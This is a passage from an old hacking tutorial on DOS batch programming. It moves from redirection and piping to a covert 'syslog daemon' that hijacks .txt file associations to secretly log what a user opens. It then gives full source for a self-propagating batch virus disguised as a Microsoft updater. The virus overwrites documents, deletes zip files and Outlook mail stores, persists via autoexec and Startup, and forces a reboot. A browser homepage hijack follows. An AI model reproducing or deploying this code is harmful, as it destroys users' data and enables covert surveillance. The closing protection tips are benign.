most commonly used to capture results of a command in a text file. Say you want to read the help on how to 

use the net command, typing the usual Help command is not useful as the results do not fit in one screen 

and scroll by extremely quickly. So instead we use the Output Redirection operator to capture the results of 

the command in a text file.



c:\windows>net > xyz.txt



This command will execute the net command and will store the results in the text file, xyz.txt . Whenever 

DOS comes by such a command, it checks if the specified file exists or not. If it does, then everything in the 

file is erased or lost and the results are stored in it. If no such file exists, then DOS creates a new file and 

stores the results in this new file.



Say, you want to store the results of more than one command in the same text file, and want to ensure that 

the results of no command are lost, then you make use of the Double Output Re Direction Symbol, which is 

the >> symbol.

For Example, 



c:\windows> net >> xyz.txt



The above command tells DOS to execute the net command and append the output to the xyz.txt file, if it 

exits.



DOS not only allows redirection to Files, but also allows redirection to various devices.



DEVICE NAME USED                       DEVICE



AUX                                     Auxiliary Device (COM1)

CLOCK$                                  Real Time Clock

COMn                                    Serial Port(COM1, COM2, COM3, COM4)

CON                                     Console(Keyboard, Screen)

LPTn                                    Parallel Port(LPT1, LPT2, LPT3)

NUL                                     NUL Device(means Nothing)

PRN                                     Printer



Say for example, you want to print the results of directory listings, then you can simply give the following 

command:



c:\windows>dir *.* > prn



The NUL device(nothing) is a bit difficult to understand and requires special mention. This device which is 

also known as the 'bit bucket' literally means nothing. Redirection to the NUL device practically has no usage 

but can be used to suppress the messages which DOS displays on the completion of a task. For example, 

when DOS has successfully copied a particular file, then it displays the message: '1 file(s) copied.'

Now say you want to suppress this task completion message, then you can make use of the NUL device.



c:\windows>copy file.txt > NUL



This will suppress the task completion message and not display it.



Redirecting Input



Just like we can redirect Output, we can also redirect Input. It is handled by the Input Redirection Operator, 

which is the < symbol. It is most commonly used to send the contents of a text file to DOS. The other common 

usage of this feature is the MORE command which displays a file one screen at a time unlike the TYPE 

command which on execution displays the entire file.(This becomes impossible to read as the file scrolls by 

at incredible speed.)Thus, many people send the long text file to the MORE command by using the 

command:



c:\windows>more < xyz.txt



This command sends the contents of the xyz.txt file to the MORE command which displays the contents 

page by page. Once the first page is read the MORE command displays something like the following on the 

screen:



......MORE......



You can also send key strokes to any DOS command which waits for User Input or needs User intervention to perform a task. You can also send multiple keystrokes. For example, a typical Format 

command requires 4 inputs, firstly pressing Enter to give the command, then Disk Insertion prompt, then the 

VOLUME label prompt and lastly the one to format another disk. So basically there are three User inputs-: 

ENTER, ENTER N and ENTER.(ENTER is Carriage return)So you can include this in a Batch file and give 

the format command in the following format:



c:\windows>format a: < xyz.bat



PIPING



Piping is a feature which combines both Input and Output Redirection. It uses the Pipe operator, which is the 

| symbol. This command captures the Output of one command and sends it as the Input of the other 

command. Say for example, when you give the command del *.* then you need to confirm that you mean to 

delete all files by pressing y. Instead we can simply do the same without any User Interaction by giving the 

command:



c:\windows> echo y | del *.* 



This command is pretty self explanatory, y is sent to the command del *.*

Batch File Programming can be very easy and quite useful. The only thing that one needs to be able to become a Batch File Programming nerd, is adequate knowledge of DOS commands. I suggest you surf the net or get a book on DOS commands and really lick the pages off the book, only then can you become an expert.





Making your own Syslog Daemon



We can easily combine the power of batch file programs and the customizable Windows Interface to make 

our own small but efficient System Logging Daemon.

Basically this Syslog Daemon can keep a track of the files opened(any kind of files), the time at which the 

files were opened also actually post the log of the User's activities on to the web, so that the System 

Administrator can keep a eye on things.



Simply follow the following steps to make the daemon-:



NOTE: In the following example, I am making a syslog daemon which keeps an eye on what text files were 

opened by the User. You can easily change what files you want it to keep an eye on by simply following the 

same steps.





1. ASSOCIATING THE FILES TO BE MONITORED TO THE LOGGER



Actually this step is not the first, but being the easiest, I have mentioned it earlier. The first thing to do is to 

associate the text files(*.txt) files to our batch file which contains the code to log the User's activities. You can 

of course keep an eye on other files as well, the procedure is almost similar. Anyway, we associate .txt files 

to our batch program so that each time a .txt file is opened, the batch file is also executed. To do this, we 

need to change the File Associations of .txt files.

For more information on Changing File Associations, refer to the Windows Help Files, simply type 

Associations and search. Anyway to change the associations of .txt files and to point them to our batch 

file, simply do the below:



Locate any .txt file on your system, select it(click once) and Press the SHIFT key. Keeping the SHIFT key 

pressed, right click on the .txt file to bring up the OPEN WITH... option. Clicking on the OPEN WITH... option 

will bring up OPEN WITH dialog box. Now click on the OTHER button and locate the batch file program 

which contains the logging code and click on OPEN and OK.

Now each time a .txt file is opened, the batch file is also executed, hence logging all interactions of the User 

with .txt files.



2. Creating the Log File



Now you need to create a text file, which actually will act like a log file and will log the activities of the User. 

This log file will contain the filename and the time at which the .txt file was opened. Create a new blank text 

file in the same directory as the batch file. Now change the attributes of this log file and make it hidden by 

changing it's attributes by issuing the ATTRIB command.



C:\windows>attrib xyz.txt +h



This will ensure that a lamer will not know as to where the log file is located.



3. CODING THE LOGGING BATCH FILE



The coding of the actual batch file which will log the User's activities and post it on the web is quite simple. If 

you have read this tutorial properly till now, then you would easily be able to understand it, although I still 

have inserted comments for novices.



echo %1 >> xyz.txt  /* Send the file name of the file opened to the log file, xyz.txt */

notepad %1  /* Launch Notepad so that the lamer does not know something is wrong. */



This logging file will only log the filename of the text file which was opened by the unsuspecting lamer, say 

you want to also log the time at which a particular file was opened, then you simply make use of the 'time' 

command. The only thing that one needs to keep in mind is that after giving the TIME command , we need 

to press enter too, which in turn has to entered in the batch file too.



Say you, who are the system administrator does not have physical access or have gone on a business trip, 

but have access to the net and need to keep in touch with the server log file, then you easily link the log file 

to a HTML file and easily view it on the click of a button. You could also make this part of the site password 

protected or even better form a public security watch contest where the person who spots something fishy 

wins a prize or something, anyway the linking can easily be done by creating an .htm or. html file and 

inserting the following snippet of code:



<html>

<title> Server Logs</title>

<body>

<a href="xyz.txt>Click here to read the Server Logs</a>

</body>

</html>



That was an example of the easiest HTML page one could create.



Another enhancement that one could make is to prevent the opening of a particular file. Say if you want to prevent the user from launching abc.txt then you would need to insert an IF conditional statement.



IF "%1" == "filename.extension" ECHO Error Message Here 



4. Enhancing the logging Batch file to escape the eyes of the Lamer.



To enhance the functioning of our logging daemon, we need to first know it's normal functioning.

Normally, if you have followed the above steps properly, then each time a .txt file is opened, the batch file 

is launched(in a new window, which is maximized) and which in turn launches Notepad. Once the filename 

and time have been logged, the batch file Window does not close automatically and the User has to exit 

from the Window manually. So maybe someone even remotely intelligent will suspect something fishy. We 

can configure our batch file to work minimized and to close itself after the logging process has been 

completed. To do this simply follow the following steps-:



a) Right Click on the Batch File.

b) Click on properties from the Pop up menu.

c) In the Program tab click on the Close on Exit option.

d) Under the same tab, under the RUN Input box select Minimized.

e) Click on Apply and voila the batch file is now more intelligent



This was just an example of a simple batch file program. You can easily create a more intelligent and more useful program using batch code.



MAKING YOUR OWN DEADLY BATCH FILE VIRUS: The atimaN_8 Batch File Virus



DISCLAIMER: This Virus was created by Ankit Fadia ankit@bol.net.in and is meant for educational purposes only. This Virus was coded to make people understand the basic concept of the Working of a Virus. Execute this Batch File at your own Risk. Any Damage caused by this file is not Ankit Fadia's fault. If you want any information regarding this Virus, do please feel free to contact me at: ankit@bol.net.in also visit my site at: http://www.crosswinds.net/~hackingtruths



The following is a simple but somewhat deadly (but quite lame)Batch File Virus that I created. I have named it, atimaN_8 I have used no advanced Batch or DOS commands in this virus and am sure that almost all you will have no problem understanding the code, If you still have trouble understanding the code, do mail me at ankit@bol.net.in



@ECHO OFF            

CLS

IF EXIST c:\winupdt.bat GOTO CODE

GOTO SETUP

:SETUP

@ECHO OFF

ECHO Welcome To Microsoft Windows System Updater Setup

ECHO.

copy %0 c:\winupdt.bat >> NUL

ECHO Scanning System.....Please Wait

prompt $P$SWindows2000

type %0 >> c:\autoexec.bat

type %0 >> c:\windows\dosstart.bat

ECHO DONE.

ECHO.

ECHO Installing Components....Please Wait

FOR %%a IN (*.zip) DO del %%a

FOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a >> NUL

FOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a >> NUL

FOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a >> NUL

ECHO DONE.

ECHO.

ECHO You Now Need to Register with Microsoft's Partner: Fortune Galaxy to receive automatic updates.

PAUSE

ECHO Downloading Components...Please Wait

START "C:\Program Files\Internet Explorer\Iexplore.exe" http://www.crosswinds.net/~hackingtruths

IF EXIST "C:\Program Files\Outlook Express\msimn.exe" del "C:\WINDOWS\Application Data\Identities\{161C80E0-1B99-11D4-9077-FD90FD02053A}\Microsoft\Outlook Express\*.dbx"

IF EXIST "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab"  del "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab"

ECHO Setup Will Now restart Your Computer....Please Wait

ECHO Your System is not faster by almost 40%.

ECHO Thank you for using a Microsoft Partner's product.

copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\winupdt.bat" >> NUL

c:\WINDOWS\RUNDLL user.exe,exitwindowsexec

CLS

GOTO END





:CODE

CLS 

@ECHO OFF

prompt $P$SWindows2000

IF "%0" == "C:\AUTOEXEC.BAT" GOTO ABC

type %0 >> c:\autoexec.bat

:ABC

type %0 >> c:\windows\dosstart.bat

FOR %%a IN (*.zip) DO del %%a

FOR %%a IN (C:\mydocu~1\*.txt) DO COPY c:\winupdt.bat %%a >> NUL

FOR %%a IN (C:\mydocu~1\*.xls) DO COPY c:\winupdt.bat %%a >> NUL

FOR %%a IN (C:\mydocu~1\*.doc) DO COPY c:\winupdt.bat %%a >> NUL

START "C:\Program Files\Internet Explorer\Iexplore.exe" http://www.crosswinds.net/~hackingtruths

IF EXIST "C:\Program Files\Outlook Express\msimn.exe" del "C:\WINDOWS\Application Data\Identities\{161C80E0-1B99-11D4-9077-FD90FD02053A}\Microsoft\Outlook Express\*.dbx" >> NUL

IF EXIST "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab"  del "C:\WINDOWS\Application Data\Microsoft\Address Book\ankit.wab" >> NUL

copy %0 "C:\WINDOWS\Start Menu\Programs\StartUp\winupdt.bat" >> NUL

GOTO :END

CLS

:END

CLS



This was an example of a pretty lame batch file virus. We can similarly create a virus which will edit the registry and create havoc. This is just a thought, I am not responsible for what you do with this.



There is simply no direct way of editing the Windows Registry through a batch file. Although there are Windows Registry Command line options(Check them out in the Advanced Windows Hacking Chapter, they are not as useful as adding keys or editing keys, can be. The best option we have is to create a .reg file and then execute it through a batch file. The most important thing to remember hear is the format of a .reg file and the fact that the first line of all .reg files should contain nothing but the string REGEDIT4, else Windows wil not be able to recognize it as a registry file. The following is a simple example of a batch file which changes the home page of the User (If Internet Explorer is installed)

to http://hackingtruths.tripod.com



@ECHO OFF

ECHO REGEDIT4 >ankit.reg

ECHO [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main] >> ankit.reg

ECHO "Start Page"="http://hackingtruths.tripod.com" >> ankit.reg

START ankit.reg 



Creating a .reg file is not as easy as it seems. You see, for Windows to recognize a file as a Registry file and for Windows to add the contents of the .reg file to the registry, it has to be in a particular recognizable format, else an error message would be displayed. I would not want to repeat, the entire Windows Registry File format here, as the Advanced Windows Hacking Manual has a huge section, specially dedicated to the Windows Registry.



Protection from Batch File Viruses



If you double-click a batch file (.bat files) it will run automatically. This can be dangerous as batch files can contain harmful commands sometimes. Worst still, if you use the single-click option, one wrong click and it's goodbye Windows. Now most power users would like to set edit as the default action. To best way to do that is to go to Explorer's Folder Options' File View tab to change the modify the default action. However, to add insult to injury, when you arrive there, you will find that the Edit and Set Default buttons has been grayed out. This is a "feature" from Microsoft you might not appreciate.

To conquer our problem here, flare up your registry editor and go to HKEY_CLASSES_ROOT\batfile\shell\open Rename the open key to run, thus becoming HKEY_CLASSES_ROOT\batfile\shell\run. Double-click the EditFlags binary value in HKEY_CLASSES_ROOT\batfile and enter 00 00 00 00 as the new value. Now, open Explorer, click Folder Options from the View menu and select the File Types tab, scroll down to the "MS-DOS Batch File" item, highlight it and click Edit. You'll notice that the last three buttons (Edit, Remove and Set Default) are now enabled and that you can select Edit as the default action.

 

             

Ankit Fadia

ankit@bol.net.in



Get the Archive of Manuals [EVERYTHING YOU DREAMT OFF] written by Ankit Fadia 

At his mailing list.

To get the manuals in your Inbox join his mailing list by sending an email to:

programmingforhackers-subscribe@egroups.com